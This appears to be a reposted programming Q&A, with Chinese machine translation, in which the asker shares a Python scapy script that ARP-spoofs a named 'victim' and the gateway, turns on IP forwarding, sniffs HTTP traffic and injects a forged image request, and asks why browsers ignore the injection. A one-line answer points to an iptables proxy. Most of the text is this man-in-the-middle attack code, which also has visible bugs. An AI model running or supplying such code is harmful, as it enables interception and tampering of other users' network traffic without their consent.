[英]Python scapy sniffing replacing images
A short explanation of what I am trying to do :) 我要做什么的简短说明:)
I want to replace every picture within the http traffic with a specific one. 我想用特定的图片替换http流量中的所有图片。
I start with arp spoofing to get into the traffic. 我先从arp欺骗进入流量。 Then I am checking if the packet contains http-raw data. 然后,我正在检查数据包是否包含http-raw数据。 If it does, I am gonna check if the request is an image-request. 如果是这样,我将检查请求是否为图像请求。 If it is an image-request I try to replace that request with my own. 如果是图像请求,则尝试用我自己的图像替换该请求。
Here is my code: 这是我的代码:
#!/usr/bin/python
from scapy.all import *
import threading
import os
# Destination is the IP-Adress of the Victim
# Source ist the IP-Adress of the Gateway
# Opcode is Reply (2)
def VictimPoisoning() :
VictimPacket = ARP(pdst=VictimIP, psrc=GatewayIP, op=2)
while True :
try:
send(VictimPacket, verbose = 0)
except KeyboardInterupt:
sys.exit(1)
# Source ist the IP-Adress of the Gateway
# Destination is the IP-Adress of the Victim
# Opcode is Reply (2)
def GatewayPoisoning() :
GatewayPacket = ARP(pdst=GatewayIP, psrc=VictimIP, op=2)
while True:
try:
send(GatewayPacket, verbose = 0)
except KeyboardInterupt:
sys.exit(1)
def TCPHttpExtract(pkt):
if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.getlayer(Raw):
#This packet should be sent by every image request
OwnPacket="GET /resources/css/mdr/global/img/iconFlash.jpg HTTP/1.1\nHost: www.site.com\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\nAccept: image/png,image/*;q=0.8,*/*;q=0.5\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nConnection: keep-alive"
StringJPG=""
StringPNG=""
StringGIF=""
StringPacket=""
liste=[]
for line in pkt.getlayer(Raw) :
liste.append(line)
#Check if the requests contains an *.jpg, *.png, *.gif
#Just check JPG - rest will be implemented later on
StringPacket=re.findall('(\s\/.*?\s)', str(liste))
StringJPG=re.findall('.*\.jpg', str(StringPacket))
StringPNG=re.findall('.*\.png', str(StringPacket))
StringGIF=re.findall('.*\.gif', str(StringPacket))
if(StringJPG):
send(OwnPacket)
#Forward packets
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
print "\n----------------------------------------"
VictimIP = raw_input("Victim-IP: ")
GatewayIP = raw_input("Gateway-IP: ")
IFACE = raw_input("Interface: ")
print "-----------------------------------------\n"
VictimThread = []
GatewayThread = []
print "Start poisoning the Victim ... \n"
while True:
try:
# VictimThread
VicPoison = threading.Thread(target=VictimPoisoning)
VicPoison.setDaemon(True)
VictimThread.append(VicPoison)
VicPoison.start()
# GatewayThread
GWayPoison = threading.Thread(target=GatewayPoisoning)
GWayPoison.setDaemon(True)
GatewayThread.append(GWayPoison)
GWayPoison.start()
pkt=sniff(iface=IFACE, prn=TCPHttpExtract)
# Cancel with STRG+C
except KeyboardInterupt:
sys.exit(1)
The arp spoofing is working and also the image regex and the sending of the packet but the browser won t change/get this image. arp欺骗正在工作,图像正则表达式和数据包的发送也可以,但浏览器不会更改/获取该图像。 Do I have to destroy the original packet first? 我必须先销毁原始数据包吗? I don t want to use ettercap, I want to do it with python here :) 我不想使用ettercap,我想在这里用python :)
*Sorry for that bad formating. *很抱歉格式不正确。
Thanks to you all for your help! 感谢大家的帮助! :) :)
这个问题的答案是结合ip-tables代理。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.